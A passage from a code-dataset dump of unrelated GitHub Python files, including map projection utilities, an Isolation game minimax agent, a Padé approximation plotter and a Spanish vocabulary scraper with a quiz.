right: float = x_field\r\n    bottom: float = y_field\r\n\r\n    crs: str = field(default=\"EPSG:3857\", init=False)\r\n    point_type: xyPoint = field(default=xyPoint, init=False, repr=False)\r\n\r\n    def wms_str(self):\r\n        return f\"{self.left},{self.bottom},{self.right},{self.top}\"\r\n\r\n\r\n@define\r\nclass Projector:\r\n    \"\"\"\r\n    Project from one CRS to another.\r\n    Or, if created with None, can be used to \"swap\" the CRS of objects.\r\n    Currently only supports EPSG:4326 and EPSG:3857.\r\n    \"\"\"\r\n\r\n    out_crs: str = field(validator=instance_of(Union[str, int, None]))\r\n    size_of_earth: int = field(default=6378137, init=False) # WGS84\r\n    earth_circ: float = field(default=20037508.342789244, init=False) # in meters\r\n    latlon_extents: namedtuple = field(default=LatLonExtents, init=False)\r\n    xy_extents: namedtuple = field(default=xyExtents, init=False)\r\n\r\n    @out_crs.validator\r\n    def _valid_crs(self, attrib, crs):\r\n        if crs is None:\r\n            return True\r\n        val_crs = [\"4326\", \"3857\"]\r\n        crs_val = [1 for x in val_crs if x in crs.lower()]\r\n        if len(crs_val) != 1:\r\n            crs_str = [\"EPSG:\" + x for x in val_crs]\r\n            err = f\"{crs} is not supported. Supported: {', '.join(crs_str)}.\"\r\n            raise ValueError(err)\r\n\r\n    def project(self, obj: Union[BBox, Point]) -> Union[BBox, Point]:\r\n        \"\"\"\r\n        Takes an object and projects it into the projector's current crs.\r\n        For objects without a crs (BBoxBase, Point, Pixel, Basepoint), it will be converted to out_crs.\r\n        Note that while much of this project uses EPSG:4326 which is lat/lon, EPSG:3857 (aka XY) is lon/lat.\r\n        This is an important distinction to make!\r\n        Args:\r\n            obj (Union[BBox, Point]): Object to convert. Presently only works for objects that derive from BBoxBase and BasePoint.\r\n        Raises:\r\n            NotImplementedError: Obj type is not supported yet.\r\n        Returns:\r\n            Union[BBox, Point]: Projected version of the input object, with crs attached.\r\n        \"\"\"\r\n        try:\r\n            if obj.crs == self.out_crs:\r\n                return obj\r\n        except AttributeError:\r\n            pass\r\n        if isinstance(obj, BBoxBase):\r\n            return self.project_bbox(obj)\r\n        elif isinstance(obj, BasePoint):\r\n            return self.project_point(obj)\r\n        else:\r\n            raise NotImplementedError(f\"{type(obj).__name__} not supported yet.\")\r\n\r\n    def project_bbox(self, bbox):\r\n        \"\"\"\r\n        Project the given bbox into our crs.\r\n        \"\"\"\r\n        ll_crs = \"4326\"\r\n        xy_crs = \"3857\"\r\n        # degrees form\r\n        if xy_crs == self.out_crs or isinstance(bbox, LatLonBBox):\r\n            nl, nt = self.project_point(bbox.tl)\r\n            nr, nb = self.project_point(bbox.br)\r\n            return xyBBox(left=nl, top=nt, right=nr, bottom=nb)\r\n        # XY form\r\n        if ll_crs == self.out_crs or isinstance(bbox, xyBBox):\r\n            tl = self.project_point(bbox.tl)\r\n            br = self.project_point(bbox.br)\r\n            return LatLonBBox(n=tl.lat, w=tl.lon, s=br.lat, e=br.lon)\r\n\r\n    def project_point(self, pnt):\r\n        \"\"\"Projects the given point into our crs.\"\"\"\r\n        # degrees form\r\n        ll_crs = \"4326\"\r\n        xy_crs = \"3857\"\r\n        if xy_crs == self.out_crs or isinstance(pnt, LatLon):\r\n            return self.latlon_to_xy(pnt)\r\n        # XY form\r\n        if ll_crs == self.out_crs or isinstance(pnt, xyPoint):\r\n            return self.xy_to_latlon(pnt)\r\n\r\n    def latlon_to_xy(self, pnt: Point) -> xyPoint:\r\n        \"\"\"Converts 4326 to 3857\"\"\"\r\n        lat, lon = pnt\r\n        # Unclear if these checks are even needed, but they seem like a good idea anyways.\r\n        lat_ext, lon_ext, rounv_v = self.latlon_extents\r\n        assert abs(lat) <= lat_ext, f\"lat ({lat}) must be in [-{lat_ext}, {lat_ext}].\"\r\n        assert abs(lon) <= 
lon_ext, f\"lon ({lon}) must be in [-{lon_ext}, {lon_ext}].\"\r\n\r\n        mx = lon * self.earth_circ / 180.0\r\n        y = math.degrees(math.log(math.tan((90 + lat) * math.pi / 360.0)))\r\n        my = y * self.earth_circ / 180.0\r\n        return xyPoint(round(mx, rounv_v), round(my, rounv_v))\r\n\r\n    def xy_to_latlon(self, pnt: Point) -> LatLon:\r\n        \"\"\"Converts 3857 to 4326\"\"\"\r\n        mx, my = pnt\r\n        # Unclear if these checks are even needed, but they seem like a good idea anyways.\r\n        x_ext, y_ext, rounv_v = self.xy_extents\r\n        assert abs(mx) <= x_ext, f\"x {mx} must be in [-{x_ext}, {x_ext}].\"\r\n        assert abs(my) <= y_ext, f\"y {my} must be in [-{y_ext}, {y_ext}].\"\r\n\r\n        lon = mx / self.earth_circ * 180.0\r\n        y = my / self.earth_circ * 180.0\r\n        x = math.atan(math.exp(math.radians(y)))\r\n        lat = 180 / math.pi * (2 * x - math.pi / 2.0)\r\n        return LatLon(round(lat, rounv_v), round(lon, rounv_v))\r\n\r\n\r\ndef tid_to_xy_bbox(tid: Iterable) -> xyBBox:\r\n    z, x, y = tid\r\n    bounds = mercantile.bounds(x, y, z)\r\n    ll_bbox = LatLonBBox(bounds)\r\n    p = Projector(None)\r\n    xy_bb = p.project(ll_bbox)\r\n    return xy_bb\r\n","repo_name":"dfloer/mbtiles-test","sub_path":"static_maps/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":18462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8689346845","text":"# cook your dish here\nt=int(input())\nwhile t!=0:\n    n=int(input())\n    l=list(map(int,input().split()))\n    lp=0\n    r=0\n    j=0\n    while j<n:\n        if l[j]!=lp:\n            c=l.count(l[j])\n            if c>r:\n                r=c\n                lp=l[j]\n            elif c==r:\n                r=c \n                lp=0\n        j+=1 \n    if lp==0:\n        print(\"CONFUSED\")\n    else:\n        print(lp)\n    t-=1","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"LAPTOPREC.py","file_name":"LAPTOPREC.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"9890883622","text":"import isolation\nimport randomplayer\nimport math\nimport copy\nimport itertools\n\n\nclass Node:\n    def __init__(self, board, move, token, is_max=True):\n        \"\"\"\n\n        :param board: a Board object\n        :param move: a Move to be made by the opponent first to get to this node\n        :param token: the Player token that is currently moving\n        :param is_max: True if this row is a Max row\n        \"\"\"\n        self._board = copy.deepcopy(board)\n        self._token = token\n        self._move = move\n        self._is_max = is_max\n        if token is isolation.Board.RED_TOKEN:\n            self._opponent = isolation.Board.BLUE_TOKEN\n        else:\n            self._opponent = isolation.Board.RED_TOKEN\n\n        if move:\n            self._board.make_move(self._opponent, move)\n\n\n        token = self._token # if is_max else self._opponent\n        neighbors = self._board.neighbor_tiles(self._board.token_location(token))\n        current_location = self._board.token_location(token)\n        push_out_squares = self._board.push_outable_square_ids()\n        push_out_squares.add(current_location)\n        self._available = [isolation.Move(idm, idt) for idm, idt\n                          in itertools.product(neighbors, push_out_squares) if idm != idt]\n\n\n        # self._last_move = last_move\n        self.allchildren = None\n\n    def is_leaf(self):\n        if self._is_max:\n            self_location = self._board.token_location(self._token)\n            self_neighbor_tiles = self._board.neighbor_tiles(self_location)\n            return len(self_neighbor_tiles) == 0\n        else:\n            opponent_location = self._board.token_location(self._opponent)\n            opponent_neighbor_tiles = self._board.neighbor_tiles(opponent_location)\n            return len(opponent_neighbor_tiles) == 0\n\n    def is_loser(self):\n        if self.is_leaf():\n            return self._is_max\n\n    def is_winner(self):\n        if 
self.is_leaf():\n return not self._is_max\n\n def is_max(self):\n return self._is_max\n\n def move(self):\n return self._move\n\n def children(self):\n if self.allchildren is None:\n # neighbors = self._board.neighbor_tiles(self._board.token_location(self._token))\n # current_location = self._board.token_location(self._token)\n # push_out_squares = self._board.push_outable_square_ids()\n # push_out_squares.add(current_location)\n # self._available = [isolation.Move(idm, idt) for idm, idt\n # in itertools.product(neighbors, push_out_squares) if idm != idt]\n\n self.allchildren = [\n Node(self._board,\n selected_move,\n self._opponent,\n is_max=not self._is_max)\n for selected_move in self._available]\n\n return self.allchildren\n\n def evaluate(self):\n distance_to_middle, closest_middle_space = self._get_distance_to_middle(self._board)\n opponent_moves = self._board.neighbor_tiles(self._board.token_location(self._opponent))\n our_moves = self._board.neighbor_tiles(self._board.token_location(self._token))\n\n num_opponent_moves = len(opponent_moves)\n num_our_moves = len(our_moves)\n\n h_value = (num_our_moves - num_opponent_moves)# - distance_to_middle\n return h_value\n\n def _get_distance_to_middle(self, board):\n middle_spaces = [19, 20, 27, 28]\n\n current_location = board.token_location(self._token)\n\n min_distance = board.distance_between(current_location, middle_spaces[0])\n closest_middle_space = middle_spaces[0]\n\n for mid in middle_spaces:\n distance_to_middle = board.distance_between(current_location, mid)\n if distance_to_middle < min_distance:\n closest_middle_space = mid\n min_distance = distance_to_middle\n return min_distance, closest_middle_space\n\n\n def __str__(self):\n return f'Node {self._is_max},\\n{self._board.square_id_map()}\\n\\n{self._board}\\n{self._token}, {self._opponent}\\n' +\\\n f'{self._move}\\navailable:\\n' + '\\n'.join(str(move) for move in self._available)\n\n\nclass PlayerAgent(isolation.Player):\n\n def __init__(self, name, token):\n \"\"\"\n Initialize this player\n :param name: This player's name\n :param token: This player's token\n \"\"\"\n super().__init__(name, token)\n if token is isolation.Board.RED_TOKEN:\n self._opponent = isolation.Board.BLUE_TOKEN\n else:\n self._opponent = isolation.Board.RED_TOKEN\n\n def take_turn(self, board):\n \"\"\"\n Make a move on the isolation board\n :param board: an Board object\n :return: Return a Move object\n \"\"\"\n\n print(\"\\n{} taking turn: \\n\".format(self._name), end='')\n\n tiles_remaining = len(board.push_outable_square_ids())\n\n if tiles_remaining >= 15:\n return self.early_game_strategy(board)\n else:\n n = Node(board, None, self._token)\n\n score, best_node = self.minimax_alpha_beta(n, -math.inf, math.inf)\n\n # When minimax returns n, if n was the initial node passed in, then the NoneType error occurs\n # because there is no move to get to that node.\n #\n # It will return n when n is a leaf node or the depth has been reached.\n # The only time it will be None is if it is a leaf node.\n if best_node is None:\n return self.early_game_strategy(board)\n else:\n move = best_node.move()\n print(f'{self._name} {move}')\n return move\n\n def choose_move(self, board):\n self_location = board.token_location(self._token)\n opponent_location = board.token_location(self._opponent)\n\n distance_to_middle, closest_middle = self.get_distance_to_middle(board)\n dir_x, dir_y = board.direction(self_location, closest_middle)\n\n def _h(self, board):\n distance_to_middle, closest_mid = 
self.get_distance_to_middle(board)\n\n opponent_moves = board.neighbor_tiles(board.token_location(self._opponent))\n our_moves = board.neighbor_tiles(board.token_location(self._token))\n\n num_opponent_moves = len(opponent_moves)\n num_our_moves = len(our_moves)\n\n h_value = distance_to_middle + (num_opponent_moves - num_our_moves)\n return h_value\n\n def get_distance_to_middle(self, board):\n middle_spaces = [19, 20, 27, 28]\n\n current_location = board.token_location(self._token)\n\n min_distance = board.distance_between(current_location, middle_spaces[0])\n closest_middle_space = middle_spaces[0]\n\n for mid in middle_spaces:\n distance_to_middle = board.distance_between(current_location, mid)\n if distance_to_middle < min_distance:\n closest_middle_space = mid\n min_distance = distance_to_middle\n return min_distance, closest_middle_space\n\n def early_game_strategy(self, board):\n # move towards the middle of the board\n # pop the tile 2 away from\n\n move_to_make = self.move_towards_middle_early_strat(board)\n punch_out_tile = self.punch_out_early_strat(board, move_to_make)\n return isolation.Move(move_to_make, punch_out_tile)\n\n def move_towards_middle_early_strat(self, board):\n min_distance_to_middle, closest_middle_space = self.get_distance_to_middle(board)\n our_moves = list(board.neighbor_tiles(board.token_location(self._token)))\n opponent_moves = list(board.neighbor_tiles(board.token_location(self._opponent)))\n # x = our_moves[0]\n # possible_moves = isolation.Board.neighbor_tiles(x)\n best_moves = our_moves[0]\n best_move = len(board.neighbor_tiles(our_moves[0])) - len(opponent_moves)\n # best_move = 0\n\n for move in our_moves:\n distance_to_the_middle = board.distance_between(move, closest_middle_space)\n possible_move = len(board.neighbor_tiles(move)) - len(opponent_moves) - (.5 * distance_to_the_middle)\n\n if possible_move >= best_move:\n if move not in board.pushed_out_square_ids():\n # if len(list_of_prev_moves) > 0 and move != list_of_prev_moves[-1]:\n best_move = possible_move\n best_moves = move\n\n return best_moves\n\n def punch_out_early_strat(self, board, move_to_tile):\n min_distance_to_middle, closest_middle_space = self.get_distance_to_middle(board)\n opponent_moves = list(board.neighbor_tiles(board.token_location(self._opponent)))\n our_moves = list(board.neighbor_tiles(board.token_location(self._token)))\n best_move = len(board.neighbor_tiles(opponent_moves[0])) - len(our_moves) + min_distance_to_middle\n punch_out = opponent_moves[0]\n\n for move in opponent_moves:\n possible_move = len(board.neighbor_tiles(move)) - len(our_moves) + min_distance_to_middle\n if possible_move >= best_move:\n if move != move_to_tile and not board.is_pushed_out(move):\n best_move = possible_move\n punch_out = move\n\n return punch_out\n\n def minimax_alpha_beta(self, n, a, b, depth=0):\n \"\"\"\n Return a pair (best_score, best_node) where best_score is\n min or max and best_node is the node associated with that score\n :param n:\n :param a:\n :param b:\n :param depth:\n :return:\n \"\"\"\n\n # print(' * ' * depth, f'a={a}, b={b}\\n', n)\n best_node = n\n\n if n.is_leaf() or depth > 2:\n if n.move() is None:\n pass\n return n.evaluate(), n\n elif n.is_max():\n for child_node in n.children():\n score, path = self.minimax_alpha_beta(child_node, a, b, depth + 1)\n if score >= b:\n return score, None # Quit searching\n if score > a:\n a = score\n best_node = child_node\n\n if best_node.move() is None:\n pass\n return a, best_node\n else:\n for child_node in n.children():\n 
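# Min node: each child can only lower beta; prune as soon as a child scores <= alpha, since Max already has a better option elsewhere.\n                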
score, path = self.minimax_alpha_beta(child_node, a, b, depth + 1)\n if score <= a:\n return score, None\n if score < b:\n b = score\n best_node = child_node\n\n if best_node.move() is None:\n pass\n return b, best_node\n\n def board_is_end_state(self, board):\n self_location = board.token_location(self._token)\n opponent_location = board.token_location(self._opponent)\n\n self_neighbor_tiles = board.neighbor_tiles(self_location)\n opponent_neighbor_tiles = board.neighbor_tiles(opponent_location)\n\n return len(self_neighbor_tiles) == 0 or len(opponent_neighbor_tiles) == 0\n\n def is_max_node(self):\n return self._token is isolation.Board.BLUE_TOKEN\n\n\nif __name__ == '__main__':\n # # Create a match\n isolation.Board.set_dimensions(6, 8)\n board = isolation.Board()\n # board.set_state(16, 20, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9,14, 15, 24, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,46, 47])\n # board.set_state(13, 9, [0, 4, 5, 6, 8, 12, 18, 19, 21, 23, 24, 25, 26, 28, 30, 32, 33, 34, 35, 36, 41, 42, 43, 44])\n match = isolation.Match(PlayerAgent('Blue', isolation.Board.BLUE_TOKEN),\n randomplayer.RandomPlayer('Red', isolation.Board.RED_TOKEN),\n board)\n match.start_play()\n\n # # Play 100 more matches\n # for i in range(100):\n # match = isolation.Match(PlayerAgent('Blue', isolation.Board.BLUE_TOKEN),\n # randomplayer.RandomPlayer('Red', isolation.Board.RED_TOKEN),\n # isolation.Board())\n # print(match.start_play())\n # print('*' * 40)\n","repo_name":"sykesab/isolation-fuschia","sub_path":"Code/fuchsia.py","file_name":"fuchsia.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29238520383","text":"from setuptools import setup\nfrom fluxory.__version__ import version\ndesc = 'Asynchronous high-performance distributed OpenFlow 1.3/1.5 framework'\n\nsetup(\n name='fluxory',\n version=version,\n description=desc,\n author='Vinicius Arcanjo',\n author_email='viniarck@gmail.com',\n keywords='OpenFlow SDN async asyncio distributed',\n url='http://github.com/viniarck/fluxory',\n python_requires='>3.7',\n packages=['fluxory'],\n license='Apache',\n install_requires=['nose>=1.3.7', 'pytest>=4.3.0', 'aio-pika>=5.2.3', 'netaddr>=0.7.19'],\n classifiers=[\n 'Programming Language :: Python :: 3.7',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n zip_safe=False,\n)\n","repo_name":"viniarck/fluxory","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25219883587","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport copy\r\nimport random\r\nimport math\r\nimport time\r\nfrom numpy.linalg import inv\r\nimport sympy as sym\r\nimport scipy.misc\r\nfrom math import sin\r\nfrom sympy import *\r\n\r\ndef fun1(x):\r\n return math.exp(-x**2)\r\ndef fun2(x):\r\n return math.cos(x)\r\ndef fun3(x):\r\n return math.sin(x)\r\ndef derivative1(fun,x,d=1e-6,n=1):\r\n return scipy.misc.derivative(fun,x,dx=d,n=n)\r\ndef derivative2(gfg_exp,x0,n=1):\r\n x, y = symbols('x y')\r\n dif=gfg_exp\r\n for i in range(n):\r\n dif = str(diff(dif, x))\r\n x=x0\r\n return eval(dif)\r\ndef calculate_c(fun,k):\r\n k=abs(k)\r\n if fun==\"exp(-x**2)\":\r\n if k % 2 == 0:\r\n return (-1) ** (int(k/2)) / math.factorial(int(k/2))\r\n else:\r\n return 0\r\n elif fun==\"cos(x)\":\r\n if k % 2 == 0:\r\n return (-1) ** (int(k/2)) / 
math.factorial(k)\r\n else:\r\n return 0\r\n elif fun==\"sin(x)\":\r\n if k % 2 == 1:\r\n return (-1) ** (int((k-1)/2)) / math.factorial(k)\r\n else:\r\n return 0\r\n\r\ndef factor_Pade(fun,N,M):\r\n A=np.zeros((M,M))\r\n y=np.zeros((M,1))\r\n b=np.zeros((M+1,1))\r\n a=np.zeros((N+1,1))\r\n for i in range(M):\r\n k=N+i+1\r\n y[i]=-calculate_c(fun,k)\r\n for i in range(M):\r\n for j in range(M):\r\n k=N-M+1+j+i\r\n A[i,j] = calculate_c(fun,k)\r\n x=np.linalg.inv(A)@y\r\n b[0]=1\r\n for i in range(M):\r\n b[i+1]=x[M-1-i]\r\n for i in range(N+1):\r\n for j in range(i+1):\r\n k=i-j\r\n c = calculate_c(fun,k)\r\n a[i]+=b[j]*c\r\n return a,b\r\ndef approximation_Pade(fun,N,M,x):\r\n a,b=factor_Pade(fun,N,M)\r\n y=[]\r\n for j in x:\r\n P = 0\r\n Q = 0\r\n for i in range(N+1):\r\n P+=a[i]*j**i\r\n for i in range(M+1):\r\n Q+=b[i]*j**i\r\n y.append(P/Q)\r\n return y\r\n# a,b=-5,5\r\n# tab=[(2, 2), (4, 4), (6, 6), (2, 4), (2, 6), (2, 8),(14,14)]\r\n# tab1=[\"\\u2082,\\u2082\",\"\\u2084,\\u2084\",\"\\u2086,\\u2086\",\"\\u2082,\\u2084\",\"\\u2082,\\u2086\",\"\\u2082,\\u2088\",\"\\u2081\\u2084,\\u2081\\u2084\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=2000))\r\n# y = [fun1(i) for i in x]\r\n# y1=approximation_Pade(\"exp(-x**2)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=r'Teoria f(x)=$e^{-x^2}$')\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n# a,b=-5,5\r\n# tab=[(2, 2), (4, 4), (6, 6)]\r\n# tab1=[\"\\u2082,\\u2082\",\"\\u2084,\\u2084\",\"\\u2086,\\u2086\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=100))\r\n# y = [fun2(i) for i in x]\r\n# y1=approximation_Pade(\"cos(x)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=\"Teoria f(x)=cos(x)\")\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n# a,b=-2*math.pi,2*math.pi\r\n# tab=[(3, 3), (5, 5), (7, 7)]\r\n# tab1=[\"\\u2083,\\u2083\",\"\\u2085,\\u2085\",\"\\u2087,\\u2087\"]\r\n# for k in range(len(tab)):\r\n# N,M=tab[k]\r\n# x = list(np.linspace(a, b, num=100))\r\n# y = [fun3(i) for i in x]\r\n# y1=approximation_Pade(\"sin(x)\",N,M,x)\r\n# plt.plot(x,y,color='black',linewidth=3,label=\"Teoria f(x)=sin(x)\")\r\n# plt.plot(x,y1,color='orange',label=f\"Aproksymacja R{tab1[k]}\")\r\n# plt.xlabel('x')\r\n# plt.ylabel('f(x)')\r\n# plt.title(\"Wykres dla N={} i M={}\".format(N,M))\r\n# plt.legend(framealpha=1, frameon=True)\r\n# plt.show()\r\n\r\nx=np.arange(-2*math.pi,2*math.pi,0.1)\r\ny=np.sin(x)\r\nfig,ax=plt.subplots()\r\nax.plot(x,y)\r\nunit = 0.5\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nx_tick = np.arange(-2, 2+unit, unit)\r\nx_label = [r\"$\" + format(r, \".2g\")+ r\"\\pi$\" for r in x_tick]\r\nax.set_xticks(x_tick*np.pi)\r\nax.set_xticklabels(x_label, fontsize=9)\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()\r\n\r\nx=np.arange(-5,5,0.1)\r\ny=np.cos(x)\r\nfig,ax=plt.subplots()\r\nax.plot(x,y)\r\nunit = 0.5\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nx_tick = np.arange(-2, 2+unit, unit)\r\nx_label = [r\"$\" + format(r, \".2g\")+ r\"\\pi$\" for r in x_tick]\r\nax.set_xticks(x_tick*np.pi)\r\nax.set_xticklabels(x_label, 
fontsize=9)\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()\r\n\r\nx = list(np.linspace(-5, 5, num=100))\r\ny = [math.exp(-i**2) for i in x]\r\nplt.plot(x,y)\r\nplt.xlabel('x')\r\nplt.ylabel('f(x)')\r\nplt.plot(x,[0]*len(x),color='black')\r\nplt.plot([0,0,0],[0,1.2,-1.2],color='black')\r\nplt.show()","repo_name":"MrLipa/WFiIS-MN-2020-21","sub_path":"Lab9/Lab9.py","file_name":"Lab9.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29793959734","text":"import bs4\nimport requests\nimport time\nfrom random import randint\nfrom random import choice\nfrom random import sample\nimport sqlite3 as sq\nimport pandas as pd\nletters = [\"a\",\"b\",\"c\",\"d\"]\nresult = requests.get('https://www.spanishdict.com/wordoftheday/1')\nsoup = bs4.BeautifulSoup(result.text,'lxml')\n\n\nclass Spanish:\n \n def __init__(self,today,yesterday,week,month,year,span_comp,get_words,Quiz):\n \n self.today = today\n self.yesterday = yesterday\n self.week = week\n self.month = month\n self.year = year\n self.span_comp = span_comp\n self.get_words = get_words\n self.Quiz = Quiz\n \n def today(self):\n \n today = soup.select('h3')[0]\n totext = today.text\n today1 = soup.select('div._3iXmZ8Jd')[0]\n totext1 = today1.text\n spex = soup.select(\"div._2I4LpW3B\")[0]\n spextext = spex.text\n enex = soup.select('div._2w_JRz6o')[0]\n enextext = enex.text\n\n print(\"Today's word is:\\n\")\n print(f\"{totext}\")\n print(f\"{totext1}\\n\")\n print(\"Example:\\n\")\n print(f\"{spextext}\")\n print(f\"{enextext}\")\n \n def yesterday(self):\n \n today = soup.select('h3')[1]\n totext = today.text\n today1 = soup.select('div._3iXmZ8Jd')[1]\n totext1 = today1.text\n spex = soup.select(\"div._2I4LpW3B\")[2]\n spextext = spex.text\n enex = soup.select('div._2w_JRz6o')[2]\n enextext = enex.text\n\n print(\"Yesterday's word was:\\n\")\n print(f\"{totext}\")\n print(f\"{totext1}\\n\")\n print(\"Example:\\n\")\n print(f\"{spextext}\")\n print(f\"{enextext}\")\n \n def week(self):\n \n count = 0\n\n for i in range(0,7):\n\n result = requests.get('https://www.spanishdict.com/wordoftheday/1')\n soup = bs4.BeautifulSoup(result.text,'lxml')\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n\n def month(self):\n\n count = 0\n\n for n in range(1,5):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n if count == 32:\n break\n\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n \n \n def year(self):\n \n count = 0\n\n for n in range(1,38):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n enword = soup.select('div._3iXmZ8Jd')[i]\n count += 1\n\n if count == 366:\n break\n\n\n print(f\"{count}){spword.text}\")\n print(f\"{enword.text}\\n\")\n \n \n\n def get_words(self):\n\n engwords = []\n spnwords = []\n\n\n for n in range(1,10):\n\n\n baseurl = ('https://www.spanishdict.com/wordoftheday/{}')\n scrapeurl = baseurl.format(n)\n\n 
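# Each archive page lists 10 entries, so pages 1-9 build a pool of roughly 90 Spanish/English word pairs.\n            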
result = requests.get(scrapeurl)\n soup = bs4.BeautifulSoup(result.text,'lxml')\n\n for i in range(0,10):\n\n spword = soup.select('h3')[i]\n spnwords.append(spword.text)\n\n enword = soup.select('div._3iXmZ8Jd')[i]\n engwords.append(enword.text)\n\n\n spanengdict = {engwords[i]: spnwords[i] for i in range(len(engwords))}\n return spanengdict\n \n \n def Quiz(self):\n \n play = True\n ques = 1\n points = 0\n name = input(\"Please enter your name: \")\n print(\"\\nGathering words, just a moment please....\")\n\n\n quiz_words = Spanish.get_words(\" \")\n\n while play is True:\n\n for x in range(1):\n choices = sample(list(quiz_words),4)\n rword = choice(choices)\n\n question = \"What is the correct translation?\"\n\n print(f\"Total Points:{points}\\n\")\n print(f\"Question {ques}) {question}\\nWord: {rword}\\n\\n\")\n print(\"Choices: \")\n\n options = list(quiz_words[x] for x in choices)\n\n for i in range(len(options)):\n\n op = str(letters[i]) + \")\" + str(options[i])\n print(op)\n\n answer = input(\"\\nEnter answer a,b,c or d:\\nYour answer:\")\n\n print(\"\\n\")\n\n if answer.lower() in letters:\n\n if quiz_words[rword] == options[letters.index(answer.lower())]:\n points += 1\n\n print(\"Correct, plus 1 point!\")\n\n else:\n print(\"Incorrect\\n\")\n print(f\"The correct answer is '{quiz_words[rword]}'\") \n\n else:\n print(\"Enter a valid input\")\n\n\n print(f\"Total Points:{points}\\n\")\n again = input(\"Play again? y/n: \")\n print(\"\\n\\n\")\n\n if again == 'y' or again == 'Y' or again == 'yes' or again == 'Yes':\n ques += 1\n\n continue\n\n elif again == 'n' or again == 'N' or again == 'no' or again == 'No':\n \n conn = sq.connect('hiscores.db')\n \n perc = round(((int(points)/int(ques))*100),2)\n\n c = conn.cursor()\n\n c.execute(\"\"\"CREATE TABLE if not exists hiscores (Name text, Points int, Questions int, Percent real)\"\"\")\n\n new_row = [name,points,ques,perc]\n\n c.execute(\"INSERT INTO hiscores VALUES (?, ?, ?, ?)\", (new_row))\n\n conn.commit()\n\n conn.close()\n\n print(f\"{name} scored {points} point(s) off of {ques} question(s)\\n\")\n print(f\"Percent Correct:{perc}%\\n\")\n print(\"Saving score...\\n\")\n time.sleep(1)\n print(\"Thanks for playing\")\n play = False\n\n def top_points(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Points DESC, Percent DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n def top_percent(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Percent DESC, Questions DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n \n def top_questions(self):\n \n conn = sq.connect('hiscores.db')\n\n df = pd.read_sql_query(\"SELECT * FROM hiscores ORDER BY Questions DESC, Percent DESC\", conn)\n\n print(df.head())\n \n conn.close()\n \n def span_comp(self):\n\n print(\"Welcome\\n\")\n print(\"Starting up...\\n\")\n time.sleep(1)\n\n\n while True:\n time.sleep(1)\n print(\"\\nFunctions:\")\n print(\"1. Today's Word\")\n print(\"2. Yesterday's Word\")\n print(\"3. Words the last week\")\n print(\"4. Words the last month\")\n print(\"5. Words the last year\")\n print(\"6. Quiz\")\n print(\"7. Hiscores - Top Points\")\n print(\"8. Hiscores - Highest Correction %\")\n print(\"9. Hiscores - Most Questions\")\n print(\"10. Exit\")\n print(\"\\n\")\n time.sleep(1)\n choice = int(input(\"Which function would you like to use? 
